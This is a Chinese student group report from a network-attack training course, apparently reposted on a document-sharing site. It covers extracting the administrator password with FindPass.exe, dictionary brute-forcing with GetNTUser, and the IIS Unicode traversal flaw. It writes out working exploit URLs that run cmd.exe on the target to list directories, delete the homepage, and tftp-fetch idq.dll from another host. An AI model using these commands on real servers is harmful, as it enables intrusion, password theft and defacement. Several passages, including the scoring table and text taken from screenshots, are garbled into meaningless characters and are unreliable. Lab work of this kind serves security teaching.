《网络攻击技术试验报告》由会员分享,可在线阅读,更多相关《网络攻击技术试验报告(15页珍藏版)》请在金锄头文库上搜索。
1、XX技术学院网络攻击技术实训?分组总结报告XX 班XX 组组长 XXX组员 XXX20XX年XX月XX日、分组方案及评分表 3、网络攻击技术实验总结报告 4一实训目的 4二实训任务4三实训过程及步骤4一物理攻击4二暴力攻击5三漏洞攻击7四实训 分析与总结实训 过程遇到的问题、解决方法、收获体会 10、分组方案及评分表分组准备及评分表班级 XX组长| XX工程小组编号XX一、工程名称:网络攻击技术实验报告二、工程/、组的组成(任务分配、根据组员的表现确定其个人系数):编亏姓 名学号在工程小组中的任务个人奉献系数(0.0 -1.0)个人得分12 1i S323 45II116j二、网络攻击技术实验
2、总结报告一实训目的实训的目的主要是使得我们掌握网络攻击技术领域的根本理论和方法,具有较强的自律意识和信息平安意识,具有使用网络攻击技术的软硬件产品解决实际问题的能力, 能够完成一系列的实验内容,并且能够熟练使用相关工具和软件。在实训学习和实践过程中,我们以具体的攻击软件和攻击防范工具,进行相关的技术训练,在强化理论的同时,掌握相关操作技能。通过攻击系统实例演示,使我们了解入侵检测系统的原理和 使用。通过网络攻击实例,使我们了解网络攻击实现的原理,加强防范意识。通过实践 网络攻击与防范攻击技术,使我们掌握网络攻击及防范技术。二实训任务1. 获取管理员密码攻击。将FindPass.exe拷贝到C盘
3、根目录,执行该程序,即可以得 到管理员密码等信息2. 暴力破解操作系统密码可以用工具软件 GetNTUser3. 利用Unicode漏洞进行的攻击:a读取出计算机上目录列表b读取对方计算机上装了几个操作系统c使用Unicode漏洞删除主贞d利用Unicode漏洞入侵系统三实训过程及步骤一物理攻击获取管理员密码攻击。将FindPass.exe拷贝到C盘根目录,使用命令提示符 进入 操作界面,输入Findpass命令,执行该程序,即可以得到管理员密码等信息。如图:图 1所示是未设置密码时的信息:图1如图:图2所示是在设置密码后的现实的信息:图2)暴力攻击暴力破解操作系统密码可以用工具软件 GetN
4、TUser ,字典攻击是最常见的一种暴 力攻击。利用人的习惯思维,并尝试各种可能的组合来猜想密码;强壮的密码可有效击 败字典攻击,它应该由多位字母、数字、通配符组成。1).启动GetNTUser软件,得到如图:图3所示的结果图32 ).添加主机IP10.130.22.100,如图:图4所示:图43 ).设置字典的选择,如图:图5所示:图54 ).字典的穷举设置,如图:图6所示:图6如图:图7所示:a) 扫描出主机上存在的用户名,管理员为Administratorb) 自动猜想空密码和与用户名相同的密码c) 可以使用指定密码字典猜想密码,密码为空图7漏洞攻击利用Unicode漏洞进行的攻击:a读
5、取出计算机上目录列表b读取对方计算机上装了几个操作系统c使用Unicode漏洞删除主贞d利用Unicode漏洞入侵系统1. 在利用Unicode漏洞进行的攻击时之前,ping两个系统是否连通,如图:图8所示:图82. ping通过后,翻开浏览器,浏览器地址栏中输入: :/192.168.1.110/scripts/ .%c0%2f./winnt/system32/cmd.exe?/c+dir+c:得到如图:图9所示的信息:读取出计算机上目录列表1加,宜那的M ,.| 7WS * lflm!kT.FZK*K4*iy元IlC-Ohtt JOiF MWi-n M4-li-:TI*f-Ohl6 diC
6、Kwnrgmgewo iPd1 Immifwti-dbfDTOFf 看】?/做 m/uroe】FiLe&h0 力1“S DLf K4 Tlrt Mhh:,二 一 d 3 3_d* JffiE 如 JIbA r- 咋*日-FrtirH.L.4-h,0-8-,.孙t:司*CGI ErrorT1if ehti fip-l (*G1 wrliFFE Hiw&whEed f mt re+smiTt cxxi1.Ef vf hEarrs.TIib bwAfS 明*uj后ii p jd3童件真 J屈代担吒 kwwwroot柜淅旬:叫* U门T古Kuti Mmf 1 _J-h_1J*NWKKKMd.)r_R?
7、tl JI * igniIt或*宜rnal rjF hlrrlprriMiinra.ofj图11输入: :/192.168.1.110/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dele+c:inetpubwwwrootdefault.asp得到如图:图12所示的信息,使用Unicode漏洞删除主贞:图12删除c:inetpubwwwrootdefault.asp过后的信息,如图:图 13所示:ScrhD HWfflg *r 如心 叩 XAo)5 Fwww root五(JETQ Iqt口 rt H:rr| .卮Ifl -号于布氏,.肉Ek H K E
8、| fctauitro |o3.pc#!图13图115.使用Unicode漏洞删除主贞后,利用Unicode漏洞入侵系统1首先需要向对方效劳器上传一些文件2下载一个tftpd32.exe ,如图:图14所示:DounwntsTiriSvtt!in9iouVMFiTaoiiNTUser图143首先在本地计算机上搭建一个 TFTP效劳器,可以使用tftpd32.exe 建立服 务器普通文件传输协议 TFTP Text File Transmission Protocol 一般用来传输单 个文件。4 点击tftpd32.exe 文件,设置本机IP为192.168.1.100,被攻击的IP为 192.
9、168.1.110,接收的文件为 idq.dll如图:图15所示:图155由丁权限不够,不能发送名为“ idq.dll文件,权限设置好后,系统拒绝传 送文件,但是可以从另一个系统获取一个名为“ idq.dll 的文件,如图:图16所示:&Tijjrenls and xuepW1MNTLJInetpjfcL:.Jn2J建画图166在浏览器中执行命令: :/192.168.1.100/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+1 92.168.1.110+ get+idq.dll由于权限不够、无法实现。四实训 分析与总结实训 过程遇到的问
10、题、解决方法、收获体会1实训中遇到的问题及解决方法:1. 获取管理员密码攻击时,设置了密码,但是使用FindPass.exe时,没有显示出密 码,讲系统重启过后,显示了密码。2. 暴力破解操作系统密码,使用工具软件GetNTUser时,出现拒绝访问,是设置问题。3. 利用Unicode漏洞进行攻击时,获取另一个系统的信息时,开始的两个系统不匹配,无法使用Unicode漏洞进行攻击。设置两个系统的关系,包含有漏洞才可行。4. 使用浏览器连接两个系统的文件传输时,无法找到需要的文件,发现是由丁权限不够,设置可读取权限,得到需要的文件。(2)收获体会:获取管理员密码攻击。将FindPass.exe拷
11、贝到C盘根目录,执行该程序,即可以得 到管理员密码等信息;暴力破解操作系统密码可以用工具软件 GetNTUsec利用Unicode 漏洞进行的攻击:读取出计算机上目录列表;读取对方计算机上装了几个操作系统;使用Unicode漏洞删除主贞;利用Unicode漏洞入侵系统。本次实训使得我们掌握网络攻击技术领域的根本理论和方法,具有较强的自律意 识和信息平安意识,具有使用网络攻击技术的软硬件产品解决实际问题的能力,能够完成一系列的实验内容,并且能够熟练使用相关工具和软件。 在实训 学习和实践过程中, 我们以具体的攻击软件和攻击防范工具,进行相关的技术训练,在强化理论的同时,掌握相关操作技能。通过攻击系统实例演示,使我们了解入侵检测系统的原理和使用。通过网络攻击实例,使我们了解网络攻击实现的原理,加强防范意识。通过实践网络攻击与防范攻击技术,使我们掌握网络攻击及防范技术。
